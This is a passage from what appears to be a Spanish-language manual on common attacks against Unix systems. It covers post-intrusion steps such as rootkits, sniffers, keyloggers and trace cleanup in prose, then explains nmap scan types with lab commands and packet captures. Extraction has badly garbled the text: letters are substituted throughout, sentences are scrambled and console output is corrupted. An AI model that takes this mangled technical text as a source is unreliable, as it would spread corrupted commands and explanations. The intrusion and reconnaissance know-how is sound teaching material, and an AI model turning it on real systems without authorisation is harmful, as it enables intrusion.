vulnerabilidades% la lista de correo Bugtraq-5# el CE<F-J# CLE-+# ,ecunia-O# directa ente de los /abricantes del so/tIare que o"era el objetivo# ' varias listas de seguridad dis"ersas "or 7nternet. Fa bin e9isten sitios donde se consiguen ;o aneras de co "rar-0> e9"loits# $erra ientas# in/or aci8n no docu entada ni "Gblica# etc. que "ueden ser Gtiles "ara introducirse en el siste a objetivo. ?tra o"ci8n es el uso de $erra ientas de "enetration testing co o las que se vieron en la "gina 25# aunque libres de uso# co o @essus o Metas"loit# ' con "osibilidades de e9tenderlas ediante "rogra as "ro"ios ;dic$as $erra ientas "oseen ca"acidad de ser e9tendidas ' "ersonalizadas>.
a"eo
de vulnerabilidades# conseguir las $erra ientas necesarias "ara llevarlo a cabo '
asegura el control "osterior ' a voluntad del siste a co "ro etido. Peneral ente es un so/tIare que est a la es"era de cierta actividad re ota# "or eje "lo# enviando una co binaci8n o secuencia de "aquetes con cierto contenido ;C Ain)le 4ac:et Aut9enticationD># o el caso es"ecial ente a una co binaci8n de algunos casos. ?tra alternativa# si es que 'a se obtuvo todo lo que se deseaba# ser)a eli inar todo rastro del ataque% li "iar $istoriales de co andos# arc$ivos te "orales# restableci iento de algGn servicio a/ectado# "er isos de arc$ivos# etc. s t)"ico% una ter inal que res"onde usuario&contraseBa# s8lo "or no brar
7nstalar un rootkit ;ver "g. 2O>% de esa $ost que se utiliza o descubierto.
7ns"eccionar ' analizar los arc$ivos ' "rocesos a los cuales se tiene acceso# en busca de in/or aci8n "ara avanzar al "r89i o salto. Modi/icar arc$ivos# utilizar de alguna engaBar a un usuario. anera ingenier)a social "ara
7nstalar un sniffer# en busca del tr/ico de la red a la cual est conectado. Es u' co Gn "oder detectar contraseBas en te9to claro# que estn siendo interca biados "or "rotocolos no encri"tados ;=FF!# FF!# ,MF!#
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -* de 22O
"rotocolos "lanos sin F:,1.&,,:1*# etc.>H las redes con utadas ;unidas "or sIitc$es> no son un "roble a si se utilizan tcnicas de A<! 12 ,"oo/ing1- o si ilares.
7nstalar so/tIare que se a"rovec$e del uso del equi"o# co o "or eje "lo un ke1logger "or so/tIare. Evidente ente# el grado de 9ito de la "er anencia en el objetivo estar
i "le entando en la organizaci8n "ara aislarse de los ataques en cuanto a todos de control# con/idencialidad ' autenticaci8n de seguridad a los distintos equi"os ' dis"ositivos de red.
1. Ler Plosario% F:,# "g.# 2*2. 1* Ler Plosario% ,,:# "g. 2*2. 12 Ler Plosario% A<!# "g. 2*.. 1- ,"oo/ing% C!arodiaD en castellano. C,"oo/ingD trata de un conjunto de tcnicas "ara /alsi/icar ' $acer "asar un ele ento invlido o no autorizado "or otro que s) lo est. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -2 de 22O
aclarar que si bien el "rotocolo 7CM! interviene en los escaneos 'a que brinda in/or aci8n en ciertos casos# los tipos de port scannin) son dos: T/4 o UD4 ;no e9isten los C"uertos 7CM!DH "or eje "lo# cuando se $abla de un "uerto CabiertoD en el esque a FC!&7!# necesaria ente es FC! o 25!>. :a idea es plenamente ;la ani"ular ;o a veces no> los "aquetes a enviar# no respetando a'or)a de los casos> los "rotocolos establecidos "or el 7EFF 1O. El
Aer rpido. 2n escaneo "uede to ar $oras ' $asta d)as en una red 4A@. Aer preciso. !ara evitar los /alsos "ositivos ' detectar "uertos real ente
11 7CM!% 7nternet Control Message !rotocol ;!rotocolo de Mensajes de Control de 7nternet>. ,i bien no es "rotocolo de Ca"a 1 "or de/inici8n 'a que no trans"orta in/or aci8n de los usuarios# de"ende ' es enca"sulado "or un "aquete 7! "ara /uncionar. Ler SFC!&7!U7llT# Ca". J. 15 FC!% Frans ission Control !rotocol ;!rotocolo de Control de Frans isi8n>. Ler SFC!&7!U7llT# Ca"s. *+ al 21. 1J 25!% 2ser 5atagra **. 1+ 7!% 7nternet !rotocol ;!rotocolo de 7nternet>. Ler SFC!&7!U7llT# Ca". -. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -- de 22O !rotocol ;!rotocolo de 5atagra a del 2suario>. Ler SFC!&7!U7llT# Ca".
abiertos.
!asar lo
los ad inistradores del sitio objetivo. FC!# al i "le entar =ia(ilidad en la co unicaci8n de la carga ;ta bin lla ado pa1load># debe anejar di/erentes estados de cone9i8n# tanto en el a'or)a de los servicios se trans isor co o en el rece"tor ;a bos 'a que nor al ente las cone9iones FC! son bidireccionales>. Este $ec$o# ' su ado a que la >interesante? para el atacante# con i "le entan sobre FC!# $ace que el escaneo de puertos T/4 sea ms a'or "otencial "ara a"rovec$ar vulnerabilidades ' de/iciencias en la in/raestructura.
1O 7EFF% 6nternet 3ngineering -ask Force N Pru"o de Frabajo en 7ngenier)a de 7nternet. Es la organizaci8n que actual ente ;' desde que /ue creada en *0OJ> regula los "rotocolos tcnicos ' desarrolla los estndares a lo largo ' anc$o de la 7nternet. 5ic$os estndares se "ublican co o docu entos lla ados <FC ;:e#uest for &omments N !edido de Co entarios>. Ler $tt"%&&III.iet/.org& ' $tt"%&&tools.iet/.org&$t l& "ara la base de datos de <FCs. 10 En estos casos# se $abla del CdestinoD co o un todo cuando en realidad# lo que recibe ' contesta o no dic$o a test es un "rogra a o servicio que est escuc$ando en el "uerto en el que se est realizando la "rueba. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -1 de 22O
Co o se "uede ver# en la Ca"tura * de Fr/ico de <ed ;que ocurre a bajo nivel> sucede lo siguiente%
uestra lo que
7. 4aquetes 7.<: :uego de 2 A<! <equest ;que "er iten averiguar la direcci8n MAC dada una 7!# "aso "revio ' necesario al env)o de tra as al objetivo> se obtiene la res"uesta A<! desde el $ost destino. +. 4aquetes .": El "ort scanner# desde el "uerto origen FC! 5O.+*# env)a al "uerto FC! 22 del objetivo un "aquete con el flag ,K@5. activado# seBal de inicio de una cone9i8n. Co o dic9o puerto est asociado a un
5. :os flags# o en castellano# CbanderasD# son bits deter inados en el encabezado de los "aquetes FC! ;Ca"a 1>. :os bits que "ueden ser utilizados son% 2<P# ACR# !,=# <,F# ,K@ ' F7@. Ler Ane9o A. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -5 de 22O
servicio 7# el ,iste a ?"erativo destino res"onde con un ,K@_ACR52. :uego el "aquete llega al origenH no $a' dudas# al recibir el ,K@_ACR desde el "uerto 22# el "ort scanner est seguro de que algGn servicio est escuc$ando all)# "or lo que se ter ina la "rueba# esta(leciendo que el puerto ++ del o(jetivo est a(ierto . !or Glti o# se env)a un nuevo "aquete con el flag <,F ;de CresetD> "ara i "edir el estableci iento co "leto de la cone9i8n. As) la "rueba trata de "asar desa"ercibida 5- "ara el $ost destino.
5* Cuando se $abla de un servicio# la re/erencia es $acia un "rogra a# so/tIare# agente o co Gn ente Cde onioD ;CdaemonD> en los ,iste as ?"erativos ti"o 2ni9. 52 @o olvidar la secuencia de un t)"ico t$ree(Ia' $ands$a6e FC!% ,'n ,'n_Ac6 Ac6.
5- El escaneo que se realiz8 en este caso /ue de ti"o C Stealt D# esto e9"lica el <,F "ara no establecer co "leta ente la cone9i8n. Ler s adelante en este ca")tulo los ti"os de escaneo.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -J de 22O
En la Ca"tura 2 se "uede ver que luego de las "eticiones A<! ;*(1> ' el "aquete con el ,K@ enviado "or el "ort scanner al "uerto O. del $ost destino ;5># la respuesta que si)ue es un RATIA/J ;J>. Esto signi/ica que no $a' ningGn servicio es"erando "aquetes sobre el "uerto O. en el destino 51# "or lo tanto# el puerto ,$ est cerrado. Co o se "uede a"reciar en todos estos casos# el "uerto origen que el "ort scanner elige ;J*J.0 en este caso> es irrelevante# co o ta bin el resto de la in/or aci8n FC! que viaja% @ro de secuencia ;,EV># @ro de Ac6# el ta aBo de la ventana FC! ;4in># el ta aBo largo del "a'load ;:en>.
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.00+7(0 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0+1151 Origen: 19(.16).0.(:635() -> De tino: 19(.16).0.30:53 Proto!o"o: DN. De !rip!i%n: -3a"forme7 Pa!6et0 Paquete Nro: + Tiempo: 0.0+153+ Origen: 19(.16).0.30: -> De tino: 19(.16).0.(: Proto!o"o: 8,3P De !rip!i%n: De tination unrea!'ab"e 9Port unrea!'ab"e:
Ca"tura -% !uerto 25! 5- Cerrado 51 Co o la ca"a FC! est a cargo del ,iste a ?"erativo# ste realiza la tarea de registrar qu "uerto est relacionado con qu "roceso# avisarle al is o cuando se abre una cone9i8n nueva# ' luego enviarle el "a'load de los "aquetes FC!. !or lo tanto# es ta bin el ,iste a ?"erativo que se encarga de la iniciaci8n ' /inalizaci8n de las cone9iones# no el "roceso. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -+ de 22O
ensaje que se
recibe es un "aquete 7CM!# del ti"o - 55# que signi/ica C!uerto inalcanzableD. En este caso# el probe consiste en un env)o de un "aquete 25! al "uerto 5- destino ;usual ente utilizado "ara el servicio 5@,5J# $e aqu) el otivo>. El CMal/or ed !ac6etD que a"arece co o descri"ci8n del e9a en del scanner es "roducto de que el "aquete# si bien "arece "ertenecer al "rotocolo 5@,# no lo esH ni siquiera inclu'e un s8lo b'te corres"ondiente al "rotocolo 5@, co o carga del datagra a. =a' que recordar que los "ort scanners suelen no res"etar los "rotocolos ' "rocedi ientos estndar# tanto de ca"as in/eriores co o su"eriores# ' aqu) $a' una "rueba de ello.
is a $ec$a con algunas $erra ientas de las cuales se dis"one# ocultando detalles "ara reducir la co "lejidad ' e9tensi8n innecesaria del docu ento. Es "or eso que aqu) no se a"recia el b'te .9.- dentro del encabezado 7CM! que indica esto. Ler el Ane9o B. 5J Ler Plosario% 5@,# "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -O de 22O
En la Ca"tura 1 se ve que el 9ost destino nunca contesta los paquetes enviados por el scanner# que $ace 2 intentos in/ructuosos ;!aquetes - ' 1>. Aqu) se "uede co "render ejor "orqu es tan Gtil el buen anejo de los tie "os en is o en caso de que el otivo# "arte de la un so/tIare de escaneo de "uertos% la docu entaci8n del "rogra a utilizado en este caso5+ es"eci/ica que el A<! <equest lo $ace "or s) objetivo est en la eta"a inicial lla ada is a red local Et$ernet ;de otra /or a lo $ace el ,iste a ost discover1DE# es obtener el <FF50 del objetivo "ara
esti ar los valores de los te "orizadores internos ' as) saber que si el $ost no contesta# tener la certeza de devolver resultados correctos. ,i to a os este caso co o eje "lo# el <FF es de .#...2O- seg# que equivalen a .#2 es"erar `*.. s.J.H entonces# de acuerdo a dic$o valor# el "ort scanner decidi8 s. "ara volver a enviar el test. :uego se dedic8 a es"erar "or un
5+ ,e $izo uso de @ a" co o so/tIare de escaneo de "uertos# ' la docu entaci8n a la que se $ace re/erencia en este caso est dis"onible en% $tt"%&&n a".org& an& an($ost(discover'.$t l 5O ost discover1 N descubri iento de $ost. :os "rogra as "ara escanear "uertos de equi"os de red "ri ero intentan establecer si el dis"ositivo objetivo est conectado a la red# encendido# recibe ' env)a "aquetes ;o no># ' la a'or cantidad de in/or aci8n de la red que los conecta% cantidad de equi"os inter edios# si alteran el tr/ico# la de ora entre ellos ' ta bin al $ost /inal# etc. :uego $acen las "ruebas corres"ondientes. Ler S=5U@MA!T. 50 Ler Plosario% <FF# "g. 2*2. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -0 de 22O
claro que el nivel de con=ian3a en el resultado D>el puerto est siendo =iltrado?E es mu! alto. El tie "o total del test dur8 unos ..5 segundos ;5.. ilisegundos>. ,i bien este eje "lo es sencillo "orque se "osee un valor de <FF bastante con/iable resultado de una "etici8n A<!# en el caso de los escaneos a objetivos /uera de una :A@ el "roble a de Csaber cunto es"erarD se co "lica# 'a que $a' segura ente varios nodos inter edios# tr/ico de terceros# ' la "osibilidad de establecer un <FF Gnico ' constante es casi i "osible. 5i/erentes "ort scanners J* to an di/erentes criterios "ara tratar de solucionarlo# ' todo buen $ac6er debe conocer estos detalles# 'a que un /also "ositivo o un negativo err8neo "uede di/icultar la tarea de obtenci8n de CgrietasD en la seguridad de la red a "enetrar. !or Glti o# $a' que resaltar que de"endiendo de las $erra ientas que se utilicen# en un escaneo de puertos UD4 s-lo se puede aseverar que un puerto UD4 est cerradoK es decir% si no est cerrado% puede estar a(ierto o =iltrado . En el caso de que no se reciba un "aquete 7CM! C5estination 2nreac$ableD# "ara deter inar que un "uerto 25! est abierto# $a' que saber de ante ano qu servicio est escuc$ando en dic$o "uerto ' C$ablarD su "rotocolo. Es cierto que $a' un juego de "robabilidades ;"or eje "lo# en el "uerto 5- es real ente raro que $a'a algo di/erente a un servidor 5@,> en donde se de/ina un conjunto de "uertos 25! co unes "ara $acer "ruebas# "ero aGn as)# esta ca"acidad de i "le entar "rotocolos de ca"as su"eriores a la 1 esca"a usual ente a los "ort scanners dada su co "lejidad. Aqu) reside otra raz8n "or la cual los escaneos FC! son general ente s tenidos en cuenta.
edio. :os tie "os de retardo entre $osts en una red et$ernet t)"ica ;de algunas "ocas quinas> "uede establecerse en alrededor de * J* !ort Bunn' es un so/tIare de escaneo que se "reocu"a e9clusiva ente "or tener un buen esque a de timing# ' as) o"ti izar tie "os de tests de "uertos /iltrados# utilizando tcnicas bastante novedosas. Ler $tt"%&&III.recurit'(labs.co &"ortbunn'&"ortbunn'.$t l Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1. de 22O
/avor ' utiliza di/erentes co binaciones no estndar de /lags FC! "ara averiguar la a'or cantidad de in/or aci8n de los "uertos destino en "articular ' de la red :a enu eraci8n que sigue $ace re/erencia a las tcnicas de escaneo dis"onibles en el "aquete de so/tIare Nmap. Aunque "robable ente sea el "ort scanner s utilizado# dis"oniendo de una variedad de ti"os de scanning que no se uestra algunas desventajas que encuentra /cil ente en otro scanner# ta bin "osterior ente. objetivo en general.
"uertos FC! en el destino. Consiste en enviar un "aquete de inicio de cone9i8n FC! ;con el /lag ,K@ activado># a es"era de una res"uesta del destino. ,i la res"uesta es un "aquete ,K@_ACR# el "uerto est abierto. ,i la res"uesta es un <,F o <,F_ACR# el "uerto est cerrado. ,i no $a' res"uesta o se recibe un 7CM! 2nreac$able# @ a" identi/ica el "uerto co o /iltrado ;si es el "ri er caso# se dice que los "aquetes que env)a el "ort scanner son Cdro"eadosDBA>.
marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - . -p (( 19(.16).0.30
.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-0(-(3 1+:50 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p open ' 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.3)1 e!on7
En la Consola @ro.* se "uede ver un escaneo $ec$o "or @ a" ' el resultado corres"ondiente% el "uerto 22 est abierto. @ a" en este caso CadivinaD que el servicio que est detrs es un ,ecure ,$ell J-# "ero no $ace una indagaci8n real al res"ectoH s8lo indica que el "uerto 22# de acuerdo a una tabla de servicios&nG ero de "uerto# es nor al ente utilizado "or ,,= ; s adelante se ver c8 o @ a"
J2 En la jerga# Cdro"earD un "aquete es CtirarloD# o CignorarloD. Es una castellanizaci8n del verbo drop# que en ingls signi/ica CtirarD. J- Ler Plosario% ,,=# "g. 2*2. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1* de 22O
"er ite $acer detecci8n de servicios>. El co ando C u7o .;nmap - . -p (( 19(.16).0.30 C ta bin /ue el que gener8 la Ca"tura *H sin e bargo las ca"turas 2 ' 1 ta bin son de ti"o ,'n# aunque los resultados /ueron di/erentes% la colu na S-4-3 ;CEstadoD> /ue re"ortada co o closed ;CCerradoD> ' filtered ;CFiltradoD> res"ectiva ente# ade s de ir dirigidos a "uertos di/erentes. En el siguiente a"artado se detallarn las o"ciones de @ a"# junto con las caracter)sticas avanzadas. Es i "ortante destacar que este ti"o de escaneo requiere de "er isos de root o ad inistrador del ,iste a ?"erativo# 'a que accede a la A!7 J1 de ,oc6ets <aIJ5# ' el acceso a sta es una de las ca"acidades e9clusivas de rootJJ.
v)as en /or a co "leta ;,'n ,'n_Ac6 b Ac6>H si el "uerto se encuentra abierto# luego de establecerse la cone9i8n# el scanner la cierra. ,i el "uerto estaba cerrado o /iltrado# los resultados son iguales al ,'n ,can. :a "rinci"al ventaja que tiene es que no son necesarios los "er isos de root# s8lo $a' que ser usuario del siste a# 'a que en este caso se res"eta el "rotocolo FC!J+ ' se $ace uso de la is a A!7JO ;B,5 ,oc6ets> que el resto de los s "rogra as de red ;navegadores Ieb# clientes de correo# etc.>. :a desventaja es que estos intentos de escaneo son sensible ente servicio que est escuc$ando en el "uerto destino# el visibles en la red que el ,'n ,can# 'a que al establecerse la cone9i8n con el is o recibe el evento de s /cil ente cone9i8n# "udiendo asentarlo en su arc$ivo de logs ' ser auditado
J1 Ler Plosario% A!7# "g. 2*.. J5 Ler Plosario% ,oc6ets <aI# "g. 2*2. JJ !ara ver un listado ' s detalle de las Ca"acidades ;&apabilites> de root en :inu9% $tt"%&&III.esdebian.org&static"ages&inde9."$"Y"agea2..1.+*5.2--1+O2+ $tt"%&&III.ib .co &develo"erIor6s&librar'&l("osi9ca".$t l $tt"%&&III.securit'/ocus.co &in/ocus&*1.. J+ El inicio de sesi8n FC! se es"eci/ica en el <FC+0-# secci8n -.1. 2<:%$tt"%&&tools.iet/.org&$t l&r/c+0-csection(-.1 JO :a A!7 que utilizan la a'or)a de los "rogra as "ara acceder a las /unciones FC!&25! del ,iste a ?"erativo se lla a B,5 ,oc6ets. Ler $tt"%&&en.Ii6i"edia.org&Ii6i&B,5Usoc6ets Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 12 de 22O
"or un ad inistrador o "ersonal de seguridad. ?tra contra es que es nota banda># 'a que "or cada "uerto a "robar# se env)an al
s si la red est saturada# su/re de retardo o el enlace tiene "oco anc$o de enos 2 "aquetes
con el ,'n ,can ;Ac6 del ?rigen en vez del <st _ el Banner del ,ervicio del destino _ el <,F del ?rigen># sin tener en cuenta justa ente# retrans isiones o de oras.
marcelo@saturno:~/src/nmap/bin$ .;nmap -P0 -p (( 19(.16).0.30 .tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-0(-(3 17:(3 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p open ' Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.119 e!on7
En la Consola 2 queda evidenciado que salvo "or la no utilizaci8n del co ando de 2ni9 CsudoDJ0 ' "or la /alta de "ar etros es"eci/icando el ti"o de escaneo+.# "edirle a @ a" que $aga un Connect ,can es A continuaci8n se escaneo de "uertos.
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.0007)0 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.000795 Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -./N0 .eq10 2en10 3..11+60 T.=1)376003 T.<$10 &.17 Paquete Nro: + Tiempo: 0.0009)5
J0 ,udo es un "rogra a que "er ite dar acceso a un usuario o un gru"o 2ni9 "er isos "ara ejecutar un co ando co o usuario root. 2<:% $tt"%&&III.sudo.Is& +. El Connect ,can es el que @ a" ejecuta "or de/ecto "ara los usuarios no root. AGn co o usuario root# el "ar etro (sF "er ite /orzar este ti"o de scanning. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1- de 22O
En los "aquetes - a 5 de la ca"tura se ve c8 o se establece el - ree'%a1 Hands ake FC! entre origen ' destino ;no olvidar que el "uerto 22 en *02.*JO...-. est abierto>. :uego ;J># interviene en Cla c$arlaD el de onio ,,= del $ost destino# enviando su banner+) tal co o lo es"eci/ica su "rotocolo +2. !or Glti o# @ a" env)a un ACR ;+> del "aquete J# ' luego cierra la cone9i8n con un <st_Ac6 en el "aquete @ro.O ;no es la /or a estndar de $acerlo# sino que es una /or a de =or3ar el cierre de la sesi8n FC!>.
+2 El "rotocolo ,,= versi8n 2 es un estndar abierto ' est detallado en varios <FCs. :a 2<:s% $tt"%&&tools.iet/.org&$t l&r/c125*# $tt"%&&III.o"enss$.co & anual.$t l
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 11 de 22O
u'
"robable ente a que un /ireIall o dis"ositivo de /iltrado de "aquetes est i "idiendo que los probes de este escaneo lleguen a destino. Justa ente ste es el objetivo de esta "rueba. Este ti"o de scanning permite dar una idea al atacante so(re qu puertos estn siendo =iltrados ' a qu "uertos del objetivo es "er itido acceder% su salida es C/ilteredD o Cun/ilteredD.
marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - # -p ((4)0 19(.16).0.30
.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-03-0( 16:+5 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p unfi"tere7 ' )0;t!p unfi"tere7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.3+6 e!on7
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000(69 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.031)9) Origen: 19(.16).0.(:3++90 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 3++90 > (( -#,50 .eq10 #!610 &in110(+ 2en10 Paquete Nro: + Tiempo: 0.03(16( Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: (( > 3++90 -$.T0 .eq10 2en10 Paquete Nro: 5 Tiempo: 0.03(3(1 Origen: 19(.16).0.(:3++90 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 3++90 > )0 -#,50 .eq10 #!610 &in1(0+) 2en10
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 15 de 22O
Paquete Nro: 6 Tiempo: 0.03(396 Origen: 19(.16).0.30:)0 -> De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: )0 > 3++90 -$.T0 .eq10 2en10
En a bos cuadros
Ca"tura @ro. J># se "uede ver que aGn cuando el "uerto 22 est abierto ' el O. est cerrado# el objetivo del test es otro% el resultado del "aquete con /lag ACR es un <,F# ' @ a" en la salida dice que a bos "uertos estn sin /iltrar. El caso o"uesto ocurre en el eje "lo siguiente%
marcelo@saturno:~/src/nmap/bin$ - u7o0 pa >or7 for mar!e"o: u7o .;nmap - # -p )0)0 19(.16).0.30
.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-03-0( 17:10 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< )0)0;t!p fi"tere7 'ttp-proDE 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.6)1 e!on7
Consola 1% @Ma"
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000697 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.036039 Origen: 19(.16).0.(:35)37 -> De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)37 > )0)0 -#,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: + Tiempo: 0.1+(6(7 Origen: 19(.16).0.(:35)3) -> De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)3) > )0)0 -#,50 .eq10 #!610 &in110(+ 2en10
En este caso# se "uede observar que el objetivo no res"onde al ACR ,can# "or lo tanto l o algGn dis"ositivo inter edio est /iltrando los "aquetes enviados.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1J de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1+ de 22O
sucede con la
a'or)a de los servicios que utilizan 25!# 'a que @ a" env)a un
probe 25! "ero vac6o+5#+J. Ade s estos resultados# en ocasiones "uede recibirse un 7CM! ti"o ;5estination 2nreac$able># "ero c8digo *# 2# 0# *. o *-# en cu'os casos# @ a" in/or a que el "uerto est /iltrado ;sola ente>. Esto es as) "orque justa ente estos "aquetes 7CM! re"ortan un "roble a con el destino o una "ro$ibici8n a nivel ad inistrativo. !or Glti o# si algGn servicio que est escuc$ando en el "uerto 25! que est siendo escaneado# retorna alguna res"uesta al Cest) uloD del datagra a vac6o enviado "or @ a"# ste lo arca co o a(ierto. Estos dos Glti os casos no son tan co unes# 'a que en las redes de $o' en d)a estos "aquetes 7CM! no son utilizados "or routers&/ireIalls ;los datagra as si "le ente se Cdro"eanD># o "or otra "arte no $a' res"ondan a un ensaje vac)o# res"ectiva ente. uc$os servicios que
Null% @ingGn Flag activado. 2in% F7@ sola ente. Cmas++% F7@ _ !,= _ 2<P. 1aimon% F7@ _ ACR. :a idea de esta co binaci8n de banderas FC! es obtener "rovec$o de un
"ar de detalles de la es"eci/icaci8n de las <FC +0- S<FCU+0-T# que establece que%
Cuando el estado de un "uerto es Cerrado# cualquier seg ento de entrada es res"ondido con un <,F co o res"uesta. ,i el estado es :isten ;Abierto># cualquier otro seg ento que no contenga un ,K@# <,F o un ACR# el $ost debe Cdro"earD el "aquete ;aGn cuando
+5 Ler Ca"tura -# "g. -+. +J @ a" ta bin dis"one de $erra ientas "ara $acer /inger"rint de servicios ' ,?s. Ler "g. 0-. ++ ,e lo lla a A as "or abreviaci8n del ingls c ristmas ;CnavidadD># "orque la re"resentaci8n del b'te de los /lags activados en el $eader FC! es si ilar a las luces de un rbol de navidad ;cIr# ecn# 2<P# ac6# !,=# rst# s'n# F7@ a ..*.*..* a .920> Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1O de 22O
no deber)a suceder este caso en un /lujo nor al>. Es "or esto que# si el "ort scanner env)a a un $ost%"uerto un "aquete con cualquier co binaci8n de /lags que no inclu'a ,K@# <,F o ACR# deber)a obtener un <,F si el "uerto est cerrado# ' ninguna res"uesta si el "uerto est abierto ;o /iltrado# claro est>. 2na contingencia a tener en cuenta es que en ste "unto en "articular no todos los ,iste as ?"erativos siguen esta reglaH los no basados en 2ni9 ;4indoIs# Cisco# 7BM ?,&1..# etc.> suelen enviar un <,F sie "re# est el "uerto abierto o cerrado. Es "or eso que "or un lado $a' que Cto ar con "inzasD los resultados de este escaneo ' no co o de/initivosH "or otra "arte# sigue siendo in/or aci8n Gtil saber que "or eje "lo# si se $a recibido un <,F a "esar de que ciertos "uertos estn abiertos# el ,? destino no es un 2ni9 o derivado ' s) "robable ente est corriendo un ,? 4indoIs o Cisco. Ade s# lo interesante de estas tcnicas de escaneo es que "er iten "asar "or edio de los /ireIalls sin estado o stateless+O ;aquellos que no tienen noci8n de las cone9iones "revia ente establecidas># 'a que "or eje "lo stos /iltran los "aquetes s8lo con el /lag ,K@ activado ' que no cu "la cierta condici8n ;"or eje "lo# que el "uerto destino sea O.>H sin e bargo# al enviarle "aquetes F7@# dic$a regla no alcanza este "aquete# "or lo que es ruteado al destino. Co o "articularidad a las caracter)sticas descri"tas# en el Mai on scan# al enviarle un F7@_ACR a un $ost que ejecute algGn viejo stac6 FC!&7! ti"o B,5+0 o derivado% si el <,F de res"uesta contiene un FF: de ventana es enor al original# o el ta aBo a'or a cero# entonces el "uerto est abiertoS!<RU10T.
A continuaci8n ;Consola @ro. 5> "ueden verse las di/erentes ejecuciones sucesivas de estos cuatro ti"os de escaneo sobre el $ost *02.*JO...-.# que tiene el "uerto 22 abierto ' el resto cerrados ;no $a' ningGn /ireIall inter"onindose>. !or
